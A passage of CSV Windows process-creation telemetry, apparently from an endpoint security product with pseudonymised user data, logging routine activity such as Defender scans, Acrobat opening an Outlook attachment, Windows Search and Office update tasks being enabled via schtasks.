7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1007,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:57:19.210389700+00:00,19888,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,aba44041ab85b375a2d7a06b3e32bf84,eff994171e80a7d59637b48cf2d338399c468dc245ad8a7cb56d4d15bdc7dc89,791e623973adcbe6888602ae5314180c62f78677,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:57:19.199831900+00:00,20096,Adobe Genuine Launcher.exe,"""Adobe Genuine Launcher.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a20196"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a20196""",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:57:19.239912700+00:00,2021-06-25 00:57:53.258860600+00:00,58e7c3a5-38b4-499f-80e0-0e2b95ee6b58,computerpii_0a470890c60768167990033d701e7bd881398861,182283,False,10.7740.19041.1052,False,11540474045178548,,11540474045178550,2021-06-25 00:57:19.199831900+00:00,20096,2021-06-25 00:57:19.199831900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\Adobe Genuine Launcher.exe,20096,18560,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,323272,2021-02-17 03:19:42+00:00,2021-02-16 19:38:26+00:00,2021-06-25 00:41:30.726772800+00:00,2020-09-22 19:30:00+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClientLauncher,AdobeGCClientLauncher.exe,Adobe Genuine Launch Utility,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1008,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 06:10:49.518880700+00:00,2776,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey A4F5701A-659E-B933-2D23-99C1EC8429FA ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 06:10:50.201900900+00:00,2021-06-24 06:13:34.369068300+00:00,e7499508-fa52-4537-8d2f-c8859543b001,computerpii_0a470890c60768167990033d701e7bd881398861,176262,False,10.7740.19041.1052,False,11540474045145394,,11540474045176817,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,18560,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+1009,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 06:10:51.760781800+00:00,14128,Acrobat.exe,"""Acrobat.exe"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\UWEMRD7K\FilePII_89a8b769fb682d9bce05dc33ed55fb7039431b24.doc.pdf""",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,3796704,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,553bf7f8c0e762a4c89b34bc6a1e8472,40d1ffbfc08e1c8fdbf1424840b87dc7f6b64cd8ab495a498aaf8cb0df715dc9,222ef0a57b2bb0eab87583daa000f1c8bca664b9,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:21.981443600+00:00,16216,OUTLOOK.EXE,"""OUTLOOK.EXE"" ",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 06:10:51.919601100+00:00,2021-06-24 06:13:34.369847600+00:00,88ddde57-7f2e-4ce4-b844-0ad8d909bd57,computerpii_0a470890c60768167990033d701e7bd881398861,176273,False,10.7740.19041.1052,False,11540474045175171,,11540474045176818,2021-06-24 00:52:21.981443600+00:00,16216,2021-06-24 00:52:21.981443600+00:00,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE,16216,2176,ActiveProcessStartkey,C:\Program Files\Microsoft Office\root\Office16,41367344,2021-06-03 12:43:37+00:00,2021-06-12 08:57:23.589811200+00:00,2021-06-24 00:52:22.210767800+00:00,2021-06-12 08:57:23.540503500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,0.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft Outlook,16.0.13801.20738,Outlook,Outlook.exe,Microsoft Outlook,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC
+1010,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:59:24.452809800+00:00,16432,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320751_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320751 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""  ""1""",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:59:24.535205400+00:00,2021-06-24 02:00:33.901051500+00:00,37fa9866-0109-45a1-945e-fbc5aa95eece,computerpii_0a470890c60768167990033d701e7bd881398861,172750,False,10.7740.19041.1052,False,11540474045144190,,11540474045175883,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,SearchIndexer.exe,4660,256,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+1011,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 06:54:31.034448300+00:00,10792,OfficeC2RClient.exe,"""OfficeC2RClient.exe"" /frequentupdate SCHEDULEDTASK displaylevel=False",PortableExecutable,2021-06-12 08:56:59.029539+00:00,C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe,23080816,0dc113fc1d718e1951bb9c59f2ac9547,1c8f95ff4650c68fffc16576e905462a6b8e1b965156073701c8ab7732a06367,78627ab451d9269178de0c336d68bdb14475501b,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 06:54:31.117779800+00:00,2021-06-23 06:56:47.533473500+00:00,fd377da3-4e14-4e5c-b3af-06c18317dee1,computerpii_0a470890c60768167990033d701e7bd881398861,164622,False,10.7740.19041.1052,False,11540474045136925,,11540474045173998,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft Office,16.0.13801.20688,OfficeC2RClient.exe,OfficeC2RClient.exe,Microsoft Office Click-to-Run Client
+1012,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 06:55:02.371316800+00:00,3000,schtasks.exe,"schtasks.exe /change /tn ""Microsoft\Office\Office ClickToRun Service Monitor"" /enable",PortableExecutable,2021-04-14 01:10:22.921960600+00:00,C:\Windows\System32\schtasks.exe,235008,796b784e98008854c27f4b18d287ba30,356280cca63ca5e887fdbe5cb4105a53341fbac9219efc51621df9ba8ee9838b,681170294f5709db976f9bd6e8c84f3537845a01,8c173d41112b95da7849df7131f8a969,f0def25047f6fa07dc371fb4c9ddcb94a5419f109d08c349e897d4ae484872a0,d499a4fd8fa4f197f0d15ae8bdeb259ee77c14f5,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:57:41.418706+00:00,7732,OfficeClickToRun.exe,"""OfficeClickToRun.exe"" /service",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 06:55:02.473564100+00:00,2021-06-23 06:56:47.534769400+00:00,77172ae7-54ff-4cb7-b512-3f7375c18f0b,computerpii_0a470890c60768167990033d701e7bd881398861,164649,False,10.7740.19041.1052,False,11540474045144114,,11540474045174003,2021-06-12 08:57:41.418706+00:00,7732,2021-06-12 08:57:41.418706+00:00,\Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe,7732,18560,ActiveProcessStartkey,C:\Program Files\Common Files\microsoft shared\ClickToRun,8689024,2021-05-25 00:49:08+00:00,2021-06-02 10:25:12+00:00,2021-06-12 08:57:41.423817800+00:00,2021-06-12 08:56:59.204972600+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Office,16.0.13801.20688,OfficeClickToRun.exe,OfficeClickToRun.exe,Microsoft Office Click-to-Run (SxS),Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,schtasks.exe,schtasks.exe,Task Scheduler Configuration Tool
+1013,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 06:55:02.378430600+00:00,21420,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,796b784e98008854c27f4b18d287ba30,356280cca63ca5e887fdbe5cb4105a53341fbac9219efc51621df9ba8ee9838b,681170294f5709db976f9bd6e8c84f3537845a01,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 06:55:02.371316800+00:00,3000,schtasks.exe,"schtasks.exe /change /tn ""Microsoft\Office\Office ClickToRun Service Monitor"" /enable",True,2021-06-12 08:57:41.418706+00:00,7732,\Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 06:55:02.473784500+00:00,2021-06-23 06:56:47.534830800+00:00,e0841dd8-3901-4894-bc17-7ec227583bc4,computerpii_0a470890c60768167990033d701e7bd881398861,164650,False,10.7740.19041.1052,False,11540474045174003,,11540474045174004,2021-06-23 06:55:02.371316800+00:00,3000,2021-06-23 06:55:02.371316800+00:00,\Device\HarddiskVolume3\Windows\System32\schtasks.exe,3000,18560,TerminateProcessStartkey,C:\Windows\System32,235008,2088-09-09 15:45:01+00:00,2021-04-14 01:10:22.927701200+00:00,2021-06-23 06:55:02.458850100+00:00,2021-04-14 01:10:22.921960600+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,schtasks.exe,schtasks.exe,Task Scheduler Configuration Tool,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1014,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 06:55:02.412848300+00:00,11828,schtasks.exe,"schtasks.exe /change /tn ""Microsoft\Office\Office Automatic Updates"" /enable",PortableExecutable,2021-04-14 01:10:22.921960600+00:00,C:\Windows\System32\schtasks.exe,235008,796b784e98008854c27f4b18d287ba30,356280cca63ca5e887fdbe5cb4105a53341fbac9219efc51621df9ba8ee9838b,681170294f5709db976f9bd6e8c84f3537845a01,8c173d41112b95da7849df7131f8a969,f0def25047f6fa07dc371fb4c9ddcb94a5419f109d08c349e897d4ae484872a0,d499a4fd8fa4f197f0d15ae8bdeb259ee77c14f5,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:57:41.418706+00:00,7732,OfficeClickToRun.exe,"""OfficeClickToRun.exe"" /service",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 06:55:02.475682800+00:00,2021-06-23 06:56:47.534909300+00:00,d112916b-6231-4157-b0c3-3ee1bdf382da,computerpii_0a470890c60768167990033d701e7bd881398861,164651,False,10.7740.19041.1052,False,11540474045144114,,11540474045174005,2021-06-12 08:57:41.418706+00:00,7732,2021-06-12 08:57:41.418706+00:00,\Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe,7732,18560,ActiveProcessStartkey,C:\Program Files\Common Files\microsoft shared\ClickToRun,8689024,2021-05-25 00:49:08+00:00,2021-06-02 10:25:12+00:00,2021-06-12 08:57:41.423817800+00:00,2021-06-12 08:56:59.204972600+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Office,16.0.13801.20688,OfficeClickToRun.exe,OfficeClickToRun.exe,Microsoft Office Click-to-Run (SxS),Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,schtasks.exe,schtasks.exe,Task Scheduler Configuration Tool
+1015,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 06:55:02.417504800+00:00,7676,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,796b784e98008854c27f4b18d287ba30,356280cca63ca5e887fdbe5cb4105a53341fbac9219efc51621df9ba8ee9838b,681170294f5709db976f9bd6e8c84f3537845a01,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 06:55:02.412848300+00:00,11828,schtasks.exe,"schtasks.exe /change /tn ""Microsoft\Office\Office Automatic Updates"" /enable",True,2021-06-12 08:57:41.418706+00:00,7732,\Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 06:55:02.475887300+00:00,2021-06-23 06:56:47.534991400+00:00,7eac674c-85ba-44e3-b834-7b01e99afdf2,computerpii_0a470890c60768167990033d701e7bd881398861,164652,False,10.7740.19041.1052,False,11540474045174005,,11540474045174006,2021-06-23 06:55:02.412848300+00:00,11828,2021-06-23 06:55:02.412848300+00:00,\Device\HarddiskVolume3\Windows\System32\schtasks.exe,11828,18560,TerminateProcessStartkey,C:\Windows\System32,235008,2088-09-09 15:45:01+00:00,2021-04-14 01:10:22.927701200+00:00,2021-06-23 06:55:02.458850100+00:00,2021-04-14 01:10:22.921960600+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,schtasks.exe,schtasks.exe,Task Scheduler Configuration Tool,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1016,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 06:55:02.446585500+00:00,5956,schtasks.exe,"schtasks.exe /change /tn ""Microsoft\Office\Office Automatic Updates 2.0"" /enable",PortableExecutable,2021-04-14 01:10:22.921960600+00:00,C:\Windows\System32\schtasks.exe,235008,796b784e98008854c27f4b18d287ba30,356280cca63ca5e887fdbe5cb4105a53341fbac9219efc51621df9ba8ee9838b,681170294f5709db976f9bd6e8c84f3537845a01,8c173d41112b95da7849df7131f8a969,f0def25047f6fa07dc371fb4c9ddcb94a5419f109d08c349e897d4ae484872a0,d499a4fd8fa4f197f0d15ae8bdeb259ee77c14f5,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:57:41.418706+00:00,7732,OfficeClickToRun.exe,"""OfficeClickToRun.exe"" /service",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 06:55:02.478248900+00:00,2021-06-23 06:56:47.535071300+00:00,4e88a370-6e53-4732-8243-c75c57871869,computerpii_0a470890c60768167990033d701e7bd881398861,164653,False,10.7740.19041.1052,False,11540474045144114,,11540474045174007,2021-06-12 08:57:41.418706+00:00,7732,2021-06-12 08:57:41.418706+00:00,\Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe,7732,18560,ActiveProcessStartkey,C:\Program Files\Common Files\microsoft shared\ClickToRun,8689024,2021-05-25 00:49:08+00:00,2021-06-02 10:25:12+00:00,2021-06-12 08:57:41.423817800+00:00,2021-06-12 08:56:59.204972600+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Office,16.0.13801.20688,OfficeClickToRun.exe,OfficeClickToRun.exe,Microsoft Office Click-to-Run (SxS),Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,schtasks.exe,schtasks.exe,Task Scheduler Configuration Tool
+1017,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 06:55:02.451235700+00:00,4128,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,796b784e98008854c27f4b18d287ba30,356280cca63ca5e887fdbe5cb4105a53341fbac9219efc51621df9ba8ee9838b,681170294f5709db976f9bd6e8c84f3537845a01,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 06:55:02.446585500+00:00,5956,schtasks.exe,"schtasks.exe /change /tn ""Microsoft\Office\Office Automatic Updates 2.0"" /enable",True,2021-06-12 08:57:41.418706+00:00,7732,\Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 06:55:02.478526700+00:00,2021-06-23 06:56:47.535149900+00:00,71fe28da-a466-4544-8bef-acc4e5b57067,computerpii_0a470890c60768167990033d701e7bd881398861,164654,False,10.7740.19041.1052,False,11540474045174007,,11540474045174008,2021-06-23 06:55:02.446585500+00:00,5956,2021-06-23 06:55:02.446585500+00:00,\Device\HarddiskVolume3\Windows\System32\schtasks.exe,5956,18560,TerminateProcessStartkey,C:\Windows\System32,235008,2088-09-09 15:45:01+00:00,2021-04-14 01:10:22.927701200+00:00,2021-06-23 06:55:02.458850100+00:00,2021-04-14 01:10:22.921960600+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,schtasks.exe,schtasks.exe,Task Scheduler Configuration Tool,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1018,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:33:28.742936600+00:00,2948,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320636_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320636 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""  ""1""",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:33:28.829703500+00:00,2021-06-23 01:35:48.688296200+00:00,09c4859d-d08a-4f3c-840d-d38068e3563d,computerpii_0a470890c60768167990033d701e7bd881398861,158789,False,10.7740.19041.1052,False,11540474045144190,,11540474045172491,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 